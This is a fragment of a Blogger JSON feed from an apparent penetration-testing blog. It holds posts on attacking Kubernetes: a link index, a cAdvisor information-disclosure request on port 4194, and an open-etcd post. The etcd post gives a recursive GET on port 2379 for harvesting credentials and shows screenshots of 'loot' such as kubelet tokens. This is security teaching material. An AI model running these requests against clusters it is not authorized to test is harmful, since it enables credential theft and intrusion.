\/\u003E\nEtcd with kube-hunter:\u0026nbsp;\u003Ca href=\"http:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-kube-hunterpy-etcd.html\" target=\"_blank\"\u003Ehttp:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-kube-hunterpy-etcd.html\u003C\/a\u003E\u003Cbr \/\u003E\ncAdvisor:\u0026nbsp;\u003Ca href=\"http:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-cadvisor.html\" target=\"_blank\"\u003Ehttp:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-cadvisor.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nKubernetes ports:\u0026nbsp;\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-list-of-ports.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-list-of-ports.html\u003C\/a\u003E\u003Cbr \/\u003E\nKubernetes dashboards:\u0026nbsp;\u003Ca href=\"http:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-kubernetes-dashboard.html\" target=\"_blank\"\u003Ehttp:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-kubernetes-dashboard.html\u003C\/a\u003E\u003Cbr \/\u003E\nKublet 10255:\u0026nbsp;h\u003Ca href=\"ttps:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-kube-hunter-10255.html\" target=\"_blank\"\u003Ettps:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-kube-hunter-10255.html\u003C\/a\u003E\u003Cbr \/\u003E\nKublet 10250\u003Cbr \/\u003E\n\u0026nbsp; \u0026nbsp; \u0026nbsp;- Container Logs: \u003Ca href=\"http:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-kubelet-api-containerlogs.html\" target=\"_blank\"\u003Ehttp:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-kubelet-api-containerlogs.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u0026nbsp; \u0026nbsp; \u0026nbsp;- Getting shellz 1:\u0026nbsp;\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-unauth-kublet-api-10250.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-unauth-kublet-api-10250.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u0026nbsp; \u0026nbsp; \u0026nbsp;- Getting shellz 2:\u0026nbsp;\u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-unauth-kublet-api-10250_16.html\" target=\"_blank\"\u003Ehttps:\/\/carnal0wnage.attackresearch.com\/2019\/01\/kubernetes-unauth-kublet-api-10250_16.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nCloud Metadata Urls and Kubernetes\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n-I'll update as they get posted\u003Cbr \/\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/8583103712815741635\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=8583103712815741635","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8583103712815741635"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8583103712815741635"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-master-post.html","title":"Kubernetes: Master Post"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-2641545550071008431"},"published":{"$t":"2019-01-06T09:00:00.002-05:00"},"updated":{"$t":"2019-01-07T09:41:34.478-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: cAdvisor"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cb style=\"background-color: white; color: #222222; font-size: 16px;\"\u003E\"cAdvisor\u003C\/b\u003E\u003Cspan style=\"background-color: white; color: #222222; font-size: 16px;\"\u003E\u0026nbsp;(Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers.\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; color: #222222; font-size: 16px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; color: #222222; font-size: 16px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003Eruns on port 4194\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; color: #222222; font-size: 16px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; color: #222222; font-size: 16px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003ELinks:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Ca href=\"https:\/\/kubernetes.io\/docs\/tasks\/debug-application-cluster\/resource-usage-monitoring\/\" target=\"_blank\"\u003Ehttps:\/\/kubernetes.io\/docs\/tasks\/debug-application-cluster\/resource-usage-monitoring\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Ca href=\"https:\/\/raesene.github.io\/blog\/2016\/10\/14\/Kubernetes-Attack-Surface-cAdvisor\/\" target=\"_blank\"\u003Ehttps:\/\/raesene.github.io\/blog\/2016\/10\/14\/Kubernetes-Attack-Surface-cAdvisor\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nWhat do you get?\u003Cbr \/\u003E\n\u003Cbr \/\u003E\ninformation disclosure about metrics of the containers.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nExample request to hit the API and dump data:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: #f9f2f4; color: #c7254e; font-family: \u0026quot;monaco\u0026quot; , \u0026quot;menlo\u0026quot; , \u0026quot;consolas\u0026quot; , \u0026quot;courier new\u0026quot; , monospace; font-size: 12.6px; white-space: nowrap;\"\u003Ehttp:\/\/1.2.3.4:4194\/api\/v2.0\/spec?recursive=true\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nScreenshots\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-_NsUrLYz-B0\/XC-pGBBkA1I\/AAAAAAAACY0\/bm-EsP-arJskqo82y5UaWb9uNGv_7fDvACLcBGAs\/s1600\/cadvisor1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"818\" data-original-width=\"1600\" height=\"203\" src=\"https:\/\/1.bp.blogspot.com\/-_NsUrLYz-B0\/XC-pGBBkA1I\/AAAAAAAACY0\/bm-EsP-arJskqo82y5UaWb9uNGv_7fDvACLcBGAs\/s400\/cadvisor1.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-lWzDHC9bCFk\/XC-pGEfAixI\/AAAAAAAACY4\/ZSMWUFOT6B8b4jRWbhkNsFuopHM2hXlnwCLcBGAs\/s1600\/cadvisor2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"923\" data-original-width=\"1600\" height=\"230\" src=\"https:\/\/1.bp.blogspot.com\/-lWzDHC9bCFk\/XC-pGEfAixI\/AAAAAAAACY4\/ZSMWUFOT6B8b4jRWbhkNsFuopHM2hXlnwCLcBGAs\/s400\/cadvisor2.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/2641545550071008431\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=2641545550071008431","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2641545550071008431"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2641545550071008431"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-cadvisor.html","title":"Kubernetes: cAdvisor"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/1.bp.blogspot.com\/-_NsUrLYz-B0\/XC-pGBBkA1I\/AAAAAAAACY0\/bm-EsP-arJskqo82y5UaWb9uNGv_7fDvACLcBGAs\/s72-c\/cadvisor1.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-4331965112967679226"},"published":{"$t":"2019-01-06T09:00:00.001-05:00"},"updated":{"$t":"2019-01-07T09:41:12.410-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: open etcd "},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: inherit;\"\u003EQuick post on\u0026nbsp;\u003Cspan style=\"background-color: white;\"\u003EKubernetes and open etcd (port 2379)\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\"\u003Ca href=\"https:\/\/coreos.com\/etcd\" style=\"background-color: white; box-sizing: border-box; letter-spacing: 0.1px; text-decoration-line: none;\" target=\"_blank\"\u003Eetcd\u003C\/a\u003E\u003Cspan style=\"background-color: white; letter-spacing: 0.1px;\"\u003E\u0026nbsp;is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative.\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; letter-spacing: 0.1px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; letter-spacing: 0.1px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E-from:\u0026nbsp;\u003Ca href=\"https:\/\/coreos.com\/blog\/introducing-the-etcd-operator.html\" target=\"_blank\"\u003Ehttps:\/\/coreos.com\/blog\/introducing-the-etcd-operator.html\u0026nbsp;\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; letter-spacing: 0.1px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; letter-spacing: 0.1px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003EWhat this means in english is that etcd stores the current state of the Kubernetes cluster usually including the kubernetes tokens and passwords.\u0026nbsp; If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you can get network info or running pods and at best credentials.\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; letter-spacing: 0.1px;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; text-size-adjust: auto;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003Erefs:\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/techbeacon.com\/hackers-guide-kubernetes-security\" style=\"background-color: white; font-family: inherit;\" target=\"_blank\"\u003Ehttps:\/\/techbeacon.com\/hackers-guide-kubernetes-security\u003C\/a\u003E\u003Cspan style=\"background-color: white; font-family: inherit;\"\u003E\u0026nbsp;\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; text-size-adjust: auto;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Ca href=\"https:\/\/elweb.co\/the-security-footgun-in-etcd\/\" target=\"_blank\"\u003Ehttps:\/\/elweb.co\/the-security-footgun-in-etcd\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; text-size-adjust: auto;\"\u003E\u003Ca href=\"https:\/\/raesene.github.io\/blog\/2017\/05\/01\/Kubernetes-Security-etcd\/\" target=\"_blank\"\u003Ehttps:\/\/raesene.github.io\/blog\/2017\/05\/01\/Kubernetes-Security-etcd\/\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; text-size-adjust: auto;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; text-size-adjust: auto;\"\u003Ethe second link talks extensively around types of info the found when they hit all the shodan endpoints for 2379 and did some analysis on the results.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: #f8f8f8; font-family: \u0026quot;helvetica\u0026quot; , \u0026quot;arial\u0026quot; , sans-serif; font-size: 14px; white-space: nowrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003EIf you manage to find open etcd the easiest way to check for creds is to just do a curl request for:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EGET http:\/\/ip_address:2379\/v2\/keys\/?recursive=true\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cspan style=\"font-family: inherit;\"\u003EExample Loot -\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003EUsually it's boring stuff like this:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/4.bp.blogspot.com\/-Nh1thUrVTLk\/XC0tO77uFJI\/AAAAAAAACXk\/JGJIMnyVfVIDv02KXDQsG4W-rmqaPJ2JQCLcBGAs\/s1600\/etcd2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"304\" data-original-width=\"1600\" height=\"120\" src=\"https:\/\/4.bp.blogspot.com\/-Nh1thUrVTLk\/XC0tO77uFJI\/AAAAAAAACXk\/JGJIMnyVfVIDv02KXDQsG4W-rmqaPJ2JQCLcBGAs\/s640\/etcd2.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003EBut occasionally you'll get more interesting things like:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/4.bp.blogspot.com\/-88Y_2MU0EX0\/XC0tY_ZskrI\/AAAAAAAACXo\/0bLnqbpE_SwGokn5xxmGHiWYaD15IGs3wCLcBGAs\/s1600\/etcd3.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"455\" data-original-width=\"1600\" height=\"180\" src=\"https:\/\/4.bp.blogspot.com\/-88Y_2MU0EX0\/XC0tY_ZskrI\/AAAAAAAACXo\/0bLnqbpE_SwGokn5xxmGHiWYaD15IGs3wCLcBGAs\/s640\/etcd3.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003Eor more fun things like kublet tokens:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-1aU4P-Io1uc\/XC0t8HiPCTI\/AAAAAAAACX8\/iVxkqtvPIhQotIgubNMn0UpPUbYdA64bACLcBGAs\/s1600\/etcd1%2Bcopy.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"745\" data-original-width=\"1600\" height=\"298\" src=\"https:\/\/2.bp.blogspot.com\/-1aU4P-Io1uc\/XC0t8HiPCTI\/AAAAAAAACX8\/iVxkqtvPIhQotIgubNMn0UpPUbYdA64bACLcBGAs\/s640\/etcd1%2Bcopy.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; white-space: nowrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/4331965112967679226\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=4331965112967679226","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/4331965112967679226"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/4331965112967679226"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-open-etcd.html","title":"Kubernetes: open etcd "}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/4.bp.blogspot.com\/-Nh1thUrVTLk\/XC0tO77uFJI\/AAAAAAAACXk\/JGJIMnyVfVIDv02KXDQsG4W-rmqaPJ2JQCLcBGAs\/s72-c\/etcd2.png","height":"72","width":"72"},"thr$total":{"$t":"0"}}]}});